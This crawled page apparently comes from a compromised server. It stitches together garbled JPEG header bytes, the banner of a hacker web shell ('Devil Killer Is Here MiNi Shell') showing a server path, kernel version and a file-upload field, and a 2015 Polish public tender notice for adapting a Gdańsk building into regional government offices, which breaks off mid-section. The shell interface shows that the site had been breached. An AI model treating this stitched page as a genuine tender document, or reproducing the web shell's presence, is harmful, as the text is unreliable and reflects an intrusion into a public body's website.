JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150602/132432-N-2015.html

<p class="kh_header"><b>Gdańsk: Wykonanie adaptacji budynku przy ul. Augustyńskiego 1 w Gdańsku
na funkcję administracyjno - biurową</b><br>
<b>Numer ogłoszenia: 132432 - 2015; data zamieszczenia: 02.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Pomorskie , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 58 3261555, faks 58 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie adaptacji budynku przy ul. Augustyńskiego 1 w Gdańsku
na funkcję administracyjno - biurową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. 1. 1. Przedmiotem zamówienia jest Wykonanie adaptacji budynku przy ul. Augustyńskiego 1 
w Gdańsku na funkcję administracyjno - biurową.
Przedmiot zamówienia w formule: Zaprojektuj i wykonaj dotyczy budynku przy ul. Augustyńskiego 1 w Gdańsku ( dz. nr  214 6 , dz. nr 214 7 ) i obejmuje swym zakresem :
1)	wykonanie dokumentacji projektowej  zmiany sposobu użytkowania obiektu wraz z uzyskaniem prawomocnego pozwolenia na budowę,
2)	wykonanie adaptacji pomieszczeń w budynku na podstawie ww. dokumentacji, prowadzącej do zmiany sposobu użytkowania z funkcji edukacyjnej (szkolnej - budynek dawnego Centrum Kształcenia Ustawicznego) na funkcję biurową ( biura Urzędu Marszałkowskiego Województwa Pomorskiego).
III.1.2. Szczegółowy przedmiot zamówienia obejmuje prace projektowe i budowlane wskazane 
w wytycznych zawartych w dokumentacji załączonych do SIWZ, tj:
1)	Koncepcji : Zmiany sposobu użytkowania budynku Urzędu Marszałkowskiego Woj. Pomorskiego  przy ul. Augustyńskiego 1 ( dz nr 214 6 i 214 7),
2)	Programie Funkcjonalno Użytkowym : Adaptacji budynku Centrum Kształcenia Ustawicznego 
w Gdańsku, ul. Augustyńskiego1  na funkcję administracyjno-biurową, autorstwa Pracowni To Tam To Projekty Autorskie Beaty Legus - Chojnackiej, z września 2014r.

Powyższa dokumentacja, tj. Koncepcja i Program Funkcjonalno Użytkowy została:
1)	wykonane na podstawie:
a)	Inwentaryzacji budowlanej autorstwa  pracowni Projektowanie Klaudia Damrat
b)	Orzeczenia Technicznego : Oceny stanu technicznego obiektu budowlanego Centrum Kształcenia Ustawicznego, autorstwa:  mgr inż. Jana Winogradow, z marca 2014r.,
2)	Zaopiniowane przez uprawnionych  rzeczoznawców bhp i p.poż ,
3)	Skonsultowane i uzgodnione przez : 
a)	Pomorskiego Wojewódzkiego Konserwatora Zabytków:
Decyzja na wycinkę drzew pod drogę pożarową nr ZN.5146.313.2014.BC,
Pismo PWKZ dotyczące przedstawionej Koncepcji nr ZN.5142.1278.2014.AK wraz z Notatką służbową z dn. 27.10.2014r,
b)	Prezydenta Miasta Gdańska: Zaświadczenie o  zgodności z mpzp nr WUAiOZ-I-674.1586.2014.4-KN.244718
c)	Zastępcę Dyrektora Departamentu DISI UMWP (w zakresie instalacji Informatycznej).

4)	Ponadto:
Zamawiający posiada od GPEC warunki na modernizację węzła cieplnego wraz z projektem Umowy Przyłączeniowej. Modernizacja węzła po stronie GPEC, która obejmuje wykonanie projektu technologii i modernizacji węzła cieplnego oraz dostosowanie w węźle cieplnym na powrocie układu pomiarowo-rozliczeniowego wraz z niezbędnym osprzętem i armaturą, urządzeniami regulującymi objętościowe natężenie przepływu nośnika ciepła oraz modułem systemu zdalnych odczytów, planowana jest na połowę 2015 r.
Zamawiający posiada pismo od Rektora Akademii Muzycznej w Gdańsku dotyczące wskazania, że pojazdy uprzywilejowane mogą korzystać z części działki nr  214/1 w celu dojazdu do drogi pożarowej zaprojektowanej w Koncepcji. Po konsultacji z organem wydającym pozwolenie na budowę, jest ono honorowane do pozwolenia na budowę.
Ze względu na planowane przedsięwzięcie Urząd Dozoru Technicznego pismem nr 06/OT/1903396/10776/149389 z dnia 14.10.2014r. przeniósł: dźwig osobowy oraz 3 urządzenia do przemieszczania osób niepełnosprawnych, znajdujące się w obiekcie, w stan wstrzymania. Wykonawca zobowiązany będzie po zakończeniu prac zgłosić do  UDT O/ Gdańsk  gotowość do ich badania oraz uzyskać zgodę na ich ponowne uruchomienie.
Zawartość dokumentacji projektowej wymieniona została w punkcie 3.1.1 PFU. Ponadto należy opracować projekt kolorystyki i wystroju wnętrz w obiekcie, specyfikację techniczną wykonania i odbioru robót (STWiOR), Plan bezpieczeństwa i ochrony zdrowia zwany Planem BIOZ oraz Harmonogram rzeczowo-finansowy (HRF) wykonania przedmiotu umowy.
Zamawiający dysponuje aktualną mapą do celów projektowych.
Planowaną inwestycję obejmuje istniejący mpzp nr 1151; karta terenu: nr 001-U33.
Zgodnie z rysunkiem nr 1 Koncepcji : Zmiana sposobu użytkowania, czarną linią        przerywaną określono zasięg inwestycji obejmujący I etap robót budowlanych, natomiast dokumentacja projektowa z pozwoleniem na budowę  musi objąć cały teren, tj. działkę 214/6 i 214/7.

III.2. Kod Wspólnego Słownika Zamówień (CPV): 
71240000-2 Usługi architektoniczne inżynieryjne i planowania
71.22.10.00-3 - Usługi architektoniczne w zakresie obiektów budowlanych;
45111300-1 Roboty rozbiórkowe
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45442100-8 Roboty malarskie
45410000-4 Tynkowanie
45262520-2 Roboty murowe
45320000-6 Roboty izolacyjne
45431000-7 Kładzenie płytek
45432111-5 Kładzenie wykładzin elastycznych
45262510-9 Roboty kamieniarskie
45421146-9 Instalowanie sufitów podwieszanych
45223500-1 Konstrukcje z betonu zbrojonego
45421000-4 Roboty w zakresie stolarki budowlanej
45431200-9 Kładzenie glazury
45232452-5 Roboty odwadniające
45313100-5 Instalowanie wind
45324000-4 Roboty w zakresie okładziny tynkowej
45432114-6 Roboty w zakresie podłóg drewnianych
45223210-1 Roboty konstrukcyjne z wykorzystaniem stali
45421160-3 Instalowanie wyrobów metalowych
45422000-1 Roboty ciesielskie
45262300-4 Betonowanie
45233220-7 Roboty w zakresie nawierzchni dróg
45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych
45112710-5 Roboty w zakresie kształtowania terenów zielonych
45311200-2 Roboty w zakresie instalacji elektrycznych
45317000-2 Inne instalacje elektryczne
45343000-3 Roboty instalacyjne przeciwpożarowe
45312200-9 Instalowanie przeciwwłamaniowych systemów alarmowych
45314320-0 Instalowanie okablowania komputerowego
45331100-7 Instalowanie centralnego ogrzewania
45331210-1 Instalowanie wentylacji
45331000-6 Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych
45232141-2 Roboty grzewcze
45331230-7 Instalowanie urządzeń chłodzących
45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
45232400-6 Roboty budowlane w zakresie kanałów ściekowych
45232130-2 Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej
45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne

III. 3. Szczegółowe uregulowania dotyczące sposobu wykonania zamówienia zostały wskazane 
w projekcie Umowy, który stanowi załącznik nr 8 do SIWZ.
III.	4.  Zamawiający wyznacza terminy dokonania wizji lokalnej przyszłego miejsca robót  dnia 
10 czerwca 2015 r. o godz. 10.00 - zbiórka Wykonawców w Departamencie Majątku Województwa UMWP przy ul. Rzeźnickiej 58, 80-822 Gdańsk
III. 5. Dodatkowo Zamawiający informuje, że:
1)	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
2)	Zamawiający nie dopuszcza możliwości składania ofert częściowych.
3)	Zamawiający nie przewiduje dokonywania zamówień uzupełniających.
4)	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.
5)	Zamawiający nie przewiduje aukcji elektronicznej. 
6)	Zamawiający nie przewiduje zwrotu kosztów udziału w niniejszym postępowaniu.
7)	Zamawiający nie przewiduje zawarcia umowy ramowej.
8)	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. 
9)	Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców,  u których ponad 50% pracowników stanowią osoby niepełnosprawne. 
10)	Postępowanie prowadzone jest w języku polskim. 
11)	Wykonawca może powierzyć wykonanie  części zamówienia podwykonawcy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 71.22.10.00-3, 45.11.13.00-1, 45.11.12.00-0, 45.44.21.00-8, 45.41.00.00-4, 45.26.25.20-2, 45.32.00.00-6, 45.43.10.00-7, 45.43.21.11-5, 45.26.25.10-9, 45.42.11.46-9, 45.22.35.00-1, 45.42.10.00-4, 45.43.12.00-9, 45.23.24.52-5, 45.31.31.00-5, 45.32.40.00-4, 45.43.21.14-6, 45.22.32.10-1, 45.42.11.60-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Złożona oferta musi być zabezpieczona wadium obejmującym okres związania ofertą 
o wartości:  330 000,00  złotych  (słownie: trzysta trzydzieści tysięcy złotych)
2. Wadium może być wnoszone w jednej lub kilku następujących formach: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz 
z 2010r. Nr 96, poz. 620).
3. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia  18 czerwca 2015 r. do godz. 9:00
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku nr konta: Bank PeKaO SA nr 76 1240 6292 1111 0010 4607 0996 z podaniem tytułu: postępowanie w przedmiocie udzielenia zamówienia publicznego na Wykonanie adaptacji budynku przy ul. Augustyńskiego 1 w Gdańsku na funkcję administracyjno - biurową Za datę wniesienia wadium w pieniądzu uznaje się datę wpływu pieniędzy na rachunek bankowy Zamawiającego.
5. Pozostałe formy wadium (oprócz wniesionej w pieniądzu) wymagają złożenia odpowiednich dokumentów w Kancelarii Ogólnej Urzędu  Marszałkowskiego w Gdańsku  ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 4a najpóźniej do dnia  18 czerwca 2015 r. do godz. 9.00.
6. Wadium, o którym mowa w ust. 5 musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty Zamawiającemu pełnej kwoty wadium, na każde jego żądanie 
w terminie związania ofertą, w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 2  do SIWZ), które również wskazano w niniejszym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże łącznie, że:
a)	w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: wykonał należycie co najmniej 2 usługi polegające na wykonaniu projektu lub wykonaniu projektu adaptacji budynków wielorodzinnych lub obiektów użyteczności publicznej lub produkcyjno - magazynowych o łącznej kubaturze minimum 
3000 m3 (trzy tysiące metrów sześciennych), przy czym na ww. projekty została  uzyskana  prawomocna decyzja o pozwoleniu na budowę.
b)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie 3 roboty budowlane polegające na wybudowaniu lub adaptacji obiektów budowlanych, tj.:  budynków wielorodzinnych lub obiektów użyteczności publicznej lub produkcyjno - magazynowych o łącznej wartości wszystkich trzech  robót budowlanych co najmniej 7 000 000,00 zł brutto, przy czym na ww. roboty została uzyskana prawomocna decyzja o pozwoleniu na użytkowanie tych obiektów o ile była taka wymagana.

Uwagi: Jeżeli zakres wykonanej roboty budowlanej przedstawionej w dokumencie złożonym na potwierdzenie, że robota budowlana została wykonana należycie i prawidłowo ukończona, jest szerszy od powyżej określonego przez Zamawiającego, należy w wykazie robót budowlanych podać wartość roboty budowlanej odpowiadającej zakresowi  wymaganemu na potwierdzenie spełnienia warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia.

Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ) oraz dokumentów, o których mowa w rozdz. VI ust. 1 pkt 3 SIWZ (wzór wykazu usług stanowi załącznik nr 6 do SIWZ) i w rozdz. VI ust. 1 pkt 2 SIWZ (wzór wykazu robót budowlanych stanowi załącznik nr 5 do SIWZ), które również wskazano w niniejszym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 2  do SIWZ), które również wskazano w niniejszym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia zespołu składającego się z co najmniej:

Uprawnienia do projektowania:

a)	Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu
 i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie  Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane   na podstawie wcześniej lub innych obowiązujących przepisów);

b) Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania 
w specjalności konstrukcyjno-budowlanej bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych 
w budownictwie Dz. U. Nr 83, poz.578) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);
c)	Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania w specjalności drogowej bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu 
 i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);
d)	Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania 
w specjalności telekomunikacyjnej w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych  bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu 
 i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów); 
e)	Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu 
 i Budownictwa z dnia 28.04.2006  w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);
f)	Projektant (min. 1 osoba) - kwalifikacje zawodowe: posiada uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 
w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);

Uprawnienia budowlane do kierowania robotami budowlanymi:

a)	Kierownika Budowy (1 osoba) - posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń (zgodnie rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów) oraz spełniający wymagania określone w § 24 ust.2 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27.07.2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. 2011 nr 165 poz. 987).  

b)	Kierownik Robót ( 1 osoba) -posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów); 

c)	Kierownik Robót ( 1 osoba) - posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów); 

d)	Kierownik Robót ( 1 osoba) - posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych do kierowania robotami bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);

e)	Kierownik Robót ( 1 osoba) - posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz.578)  lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów);

f)	1 osobę pełniącą nadzór archeologiczny posiadającą tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku archeologia oraz co najmniej 12-to miesięczną praktykę w zakresie tych badań.

Uwaga: 
1.	UWAGA: Każda z osób musi wykazać doświadczenie co najmniej w jednym ze wskazanych w warunku w/w punktów (uprawnienia do projektowania od pkt a do pkt f i uprawnienia budowlane do kierowania robotami budowlanymi od pkt a do pkt f), przy czym doświadczenie tych osób musi obejmować łącznie doświadczenie w całym zakresie postawionego warunku.
2.	Zamawiający dopuszcza, aby jedna osoba pełniła więcej niż jedną funkcję w przypadku posiadania odpowiednich uprawnień. Dotyczy również kierownika budowy.
3.	Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające mu kwalifikacje zawodowe / dokumenty uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie, wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art.12a i innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t j. Dz. U. z 2013 r. poz. 1409 ze zm.)oraz ustawy z dnia 19 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej 
(Dz. U. z 2008 r. Nr 63, poz. 394 ze zm.); 
.

Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 2 do SIWZ) oraz dokumentów, o których mowa w rozdz. VI ust. 1 pkt 4 SIWZ (wzór wykazu osób stanowi załącznik nr 7 do SIWZ), które również wskazano w niniejszym ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1 500 000,00 zł  (jeden milion pięćset tysięcy złotych)
